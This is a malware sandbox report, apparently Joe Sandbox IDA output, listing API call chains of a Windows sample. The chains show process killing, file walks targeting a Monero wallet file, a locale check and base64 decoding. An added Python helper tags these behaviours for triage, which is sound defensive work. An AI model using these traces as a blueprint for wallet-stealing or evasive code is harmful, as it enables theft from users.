                                  • Opcode Fuzzy Hash: 077db60a536bd58a201e51fd8ee7ed393a1d6da7a9240e59882ff1c7f85fec89
                                  • Instruction Fuzzy Hash: 55B2E4F360C2049FE304AE29EC8567AFBE9EF94720F16893DE6C483744EA3558458797
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008015A8,00800BAF), ref: 007EDBEB
                                  • StrCmpCA.SHLWAPI(?,008015AC), ref: 007EDC33
                                  • StrCmpCA.SHLWAPI(?,008015B0), ref: 007EDC49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007EDECC
                                  • FindClose.KERNEL32(000000FF), ref: 007EDEDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 91d8cfd5c757dfbd534d6f0a3f13992046ff52cccaa31ea1d9a2e5518fd589b9
                                  • Instruction ID: ccff65080310e8db416d05442575da40d6f1454d37e32881b96f094af18317c9
                                  • Opcode Fuzzy Hash: 91d8cfd5c757dfbd534d6f0a3f13992046ff52cccaa31ea1d9a2e5518fd589b9
                                  • Instruction Fuzzy Hash: 5A915DB2600248EBCB14FB74DD5A9FD737DAF98340F008658F91A56191EE389B5CCB52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "+VE$A~w$[$?{$[F5}$[F5}$aZkZ$b)?$kBd$~;<e
                                  • API String ID: 0-544712411
                                  • Opcode ID: 9750fd077aadc4350263658026bbc7e2c4f9ce5d696e6b679b54c0aaf0d3e885
                                  • Instruction ID: 8adfef5ae725a2d8a61b3659ae4e44f1ce75ab79bab0d7f35ff6dcd2190a8be0
                                  • Opcode Fuzzy Hash: 9750fd077aadc4350263658026bbc7e2c4f9ce5d696e6b679b54c0aaf0d3e885
                                  • Instruction Fuzzy Hash: 71B249F3A082149FE3046E2DDC8567BFBD9EF94660F1A863EE9C4D3744E93598018792
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007F9905
                                  • Process32First.KERNEL32(007E9FDE,00000128), ref: 007F9919
                                  • Process32Next.KERNEL32(007E9FDE,00000128), ref: 007F992E
                                  • StrCmpCA.SHLWAPI(?,007E9FDE), ref: 007F9943
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007F995C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 007F997A
                                  • CloseHandle.KERNEL32(00000000), ref: 007F9987
                                  • CloseHandle.KERNEL32(007E9FDE), ref: 007F9993
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: 5815ee2ff1a88a9167686e729980b90ebf8cbd70f608d02a07b2ea88bffc057e
                                  • Instruction ID: 5050708c69e3169ece4a3e90232cabcfed53434367c1d5b2c81a08d9e0bdc3d2
                                  • Opcode Fuzzy Hash: 5815ee2ff1a88a9167686e729980b90ebf8cbd70f608d02a07b2ea88bffc057e
                                  • Instruction Fuzzy Hash: 4211F475904218ABDB24DFE5DC48BEDB779BB88701F00468CF605A6251DBB4AB45CFA0
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,008005B7), ref: 007F7D71
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 007F7D89
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 007F7D9D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 007F7DF2
                                  • LocalFree.KERNEL32(00000000), ref: 007F7EB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 5cda6cbaf882ebace035f35c184d24f3fe626a377329cfbfe473b91265ebefe9
                                  • Instruction ID: 89ac8d059f1c3e24f973cad9daf3d67099366f0111d65b062f68b12a5132f45d
                                  • Opcode Fuzzy Hash: 5cda6cbaf882ebace035f35c184d24f3fe626a377329cfbfe473b91265ebefe9
                                  • Instruction Fuzzy Hash: 194108B194421CEBCB24DB94DC99BFEB775FB44700F1041D9E20AA6291DB786E84CFA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Cgg$Z`[s$\Q3=$^k^1$cX/$-_$L|I
                                  • API String ID: 0-2937182775
                                  • Opcode ID: 00ab4f0038cd511c379a4b6d9568ef7d897a646cc21c4a62c344162433eabaad
                                  • Instruction ID: f0b62f94c14da9b5503eae5819e970d50aae6845b6d75c16deaad53d4e514c9f
                                  • Opcode Fuzzy Hash: 00ab4f0038cd511c379a4b6d9568ef7d897a646cc21c4a62c344162433eabaad
                                  • Instruction Fuzzy Hash: 8FB2F6F3A0C2009FE704AE29EC8577AB7E9EF94320F1A493DEAC5C7344E63558458796
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00800D79), ref: 007EE5A2
                                  • StrCmpCA.SHLWAPI(?,008015F0), ref: 007EE5F2
                                  • StrCmpCA.SHLWAPI(?,008015F4), ref: 007EE608
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007EECDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: 868dcf68f20d2dca4898ac0b2533be69cfda172163efe08fa07a62be943a9a7f
                                  • Instruction ID: 594aab52d60ca7dd58ee4f2af14572b31a7a2d2fa6c4bc29f2a90107deb1fb9d
                                  • Opcode Fuzzy Hash: 868dcf68f20d2dca4898ac0b2533be69cfda172163efe08fa07a62be943a9a7f
                                  • Instruction Fuzzy Hash: 3B12C2B1A1011CEBCB14FB60DDAAAFD7379AF54300F404599B61E56291EF386B48CB62
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: *bG$<"v1$<A3}$A~|$gv$)zz
                                  • API String ID: 0-730244080
                                  • Opcode ID: 7bd6ce6377ff5651bf3215640694cf0bd80e4f7cf0c8a4bf4803d464da37457f
                                  • Instruction ID: ba9c7d52c69bcc879d94c9474bb7efa88a37563df690a27db7d4269a2a45b4c5
                                  • Opcode Fuzzy Hash: 7bd6ce6377ff5651bf3215640694cf0bd80e4f7cf0c8a4bf4803d464da37457f
                                  • Instruction Fuzzy Hash: 27B2E5F3A0C2049FE3046E2DEC8567ABBE9EF94720F1A453DEAC4C3744EA7558058697
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O~,00000000,00000000), ref: 007EA23F
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,007E4F3E,00000000,?), ref: 007EA251
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O~,00000000,00000000), ref: 007EA27A
                                  • LocalFree.KERNEL32(?,?,?,?,007E4F3E,00000000,?), ref: 007EA28F
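                                  The four "APIs" listings above describe, in raw call order, the behaviours a triage analyst cares about in this sample: the Toolhelp32 loop that opens a matching process with access 0x1 (PROCESS_TERMINATE) and calls TerminateProcess; the FindFirstFileA/FindNextFileA walk with the "\*.*" wildcard whose string helpers carry "\Monero\wallet.keys"; the GetKeyboardLayoutList/GetLocaleInfoA chain with LCType 0x2 (LOCALE_SLANGUAGE), which is the language check the "evasive API chain" signature refers to; and the two-call CryptStringToBinaryA pattern with dwFlags 0x1 (CRYPT_STRING_BASE64), the size query followed by the real decode. The following helper is an added example, not part of the Joe Sandbox report or its IDA plugin output: it parses those listings exactly as printed and tags each function with the behaviour its call chain implies. The sample traces are copied verbatim from the listings above; the Win32 constant names come from the SDK headers (the report prints only hex values); the tag names and the function labels are this example's own.

```python
"""Added triage helper: tag Joe Sandbox per-function API listings (not part of the report)."""
import re
from typing import List, NamedTuple, Optional, Set

# Win32 constants from the SDK headers; the report shows only the raw hex arguments.
TH32CS_SNAPPROCESS = 0x00000002   # CreateToolhelp32Snapshot dwFlags
PROCESS_TERMINATE = 0x00000001    # OpenProcess dwDesiredAccess
LOCALE_SLANGUAGE = 0x00000002     # GetLocaleInfoA LCType
CRYPT_STRING_BASE64 = 0x00000001  # CryptStringToBinaryA dwFlags


class ApiCall(NamedTuple):
    name: str        # e.g. "OpenProcess"
    module: str      # e.g. "KERNEL32"
    args: List[str]  # argument tokens as printed; "?" means unresolved by the sandbox
    subcall: bool    # True for "Part of subcall function" lines (callee of this function)


# One report line: optional subcall prefix, Name.MODULE(args), ref: ADDR
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]{8}:\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*[0-9A-Fa-f]{8}\s*$"
)


def parse_trace(text: str) -> List[ApiCall]:
    """Return the API calls of one function block; headings and blank lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("mod").upper(), args,
                             "Part of subcall function" in line))
    return calls


def _hex_arg(call: ApiCall, index: int) -> Optional[int]:
    """Numeric value of argument `index`, or None when it is "?" or a string literal."""
    if index >= len(call.args):
        return None
    try:
        return int(call.args[index], 16)
    except ValueError:
        return None


def classify(calls: List[ApiCall]) -> Set[str]:
    """Map one function's call chain to behaviour tags (tag names are this example's own)."""
    names = {c.name for c in calls}
    all_args = [a for c in calls for a in c.args]
    tags: Set[str] = set()
    # Process snapshot -> Process32First/Next -> name compare -> OpenProcess(PROCESS_TERMINATE)
    # -> TerminateProcess: the function kills a process chosen by name.
    snapshot = any(c.name == "CreateToolhelp32Snapshot"
                   and (_hex_arg(c, 0) or 0) & TH32CS_SNAPPROCESS for c in calls)
    open_for_kill = any(c.name == "OpenProcess"
                        and (_hex_arg(c, 0) or 0) & PROCESS_TERMINATE for c in calls)
    compares = names & {"StrCmpCA", "StrCmpCW", "lstrcmpA", "lstrcmpiA", "lstrcmpW", "lstrcmpiW"}
    if snapshot and open_for_kill and compares and \
            {"Process32First", "Process32Next", "TerminateProcess"} <= names:
        tags.add("kill-process-by-name")
    # FindFirstFile/FindNextFile pair: a directory walk; "\*.*" lists every entry.
    if {"FindFirstFileA", "FindNextFileA"} <= names or {"FindFirstFileW", "FindNextFileW"} <= names:
        tags.add("directory-walk")
        if any("*.*" in a for a in all_args):
            tags.add("directory-walk-wildcard")
    # A wallet path among the arguments (here "\Monero\wallet.keys") marks a crypto-wallet target.
    if any("wallet" in a.lower() for a in all_args):
        tags.add("crypto-wallet-target")
    # Keyboard layouts turned into language names: the "stop on certain locales" check.
    if "GetKeyboardLayoutList" in names and any(
            c.name == "GetLocaleInfoA" and _hex_arg(c, 1) == LOCALE_SLANGUAGE for c in calls):
        tags.add("keyboard-layout-language-check")
    # CryptStringToBinaryA with dwFlags == CRYPT_STRING_BASE64: embedded strings are base64.
    if any(c.name == "CryptStringToBinaryA" and _hex_arg(c, 2) == CRYPT_STRING_BASE64
           for c in calls):
        tags.add("base64-decode-crypt32")
    return tags


# Sample inputs: the four "APIs" listings copied from the report above.
KILL_TRACE = r"""
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007F9905
• Process32First.KERNEL32(007E9FDE,00000128), ref: 007F9919
• Process32Next.KERNEL32(007E9FDE,00000128), ref: 007F992E
• StrCmpCA.SHLWAPI(?,007E9FDE), ref: 007F9943
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 007F995C
• TerminateProcess.KERNEL32(00000000,00000000), ref: 007F997A
• CloseHandle.KERNEL32(00000000), ref: 007F9987
• CloseHandle.KERNEL32(007E9FDE), ref: 007F9993
"""
WALK_TRACE = r"""
  • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
  • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00800D79), ref: 007EE5A2
• StrCmpCA.SHLWAPI(?,008015F0), ref: 007EE5F2
• StrCmpCA.SHLWAPI(?,008015F4), ref: 007EE608
• FindNextFileA.KERNEL32(000000FF,?), ref: 007EECDF
"""
LOCALE_TRACE = r"""
• GetKeyboardLayoutList.USER32(00000000,00000000,008005B7), ref: 007F7D71
• LocalAlloc.KERNEL32(00000040,?), ref: 007F7D89
• GetKeyboardLayoutList.USER32(?,00000000), ref: 007F7D9D
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 007F7DF2
• LocalFree.KERNEL32(00000000), ref: 007F7EB2
"""
B64_TRACE = r"""
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O~,00000000,00000000), ref: 007EA23F
• LocalAlloc.KERNEL32(00000040,?,?,?,007E4F3E,00000000,?), ref: 007EA251
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O~,00000000,00000000), ref: 007EA27A
• LocalFree.KERNEL32(?,?,?,?,007E4F3E,00000000,?), ref: 007EA28F
"""


def triage_report() -> dict:
    """Sorted tags per sample function; labels are hypothetical (first call address)."""
    samples = (("kill_007F9905", KILL_TRACE), ("walk_007EE5A2", WALK_TRACE),
               ("locale_007F7D71", LOCALE_TRACE), ("b64_007EA23F", B64_TRACE))
    return {label: sorted(classify(parse_trace(trace))) for label, trace in samples}


if __name__ == "__main__":
    for label, tags in triage_report().items():
        print(f"{label}: {', '.join(tags) or '-'}")
```

                                  The tags are deliberately conservative: the kill tag requires the snapshot flag, a process-name compare, PROCESS_TERMINATE in the OpenProcess access mask and TerminateProcess all in the same function, so a benign enumerator that only reads the process list is not flagged. Anything the sandbox could not resolve is printed as "?", which the helper treats as unknown rather than as zero.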
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
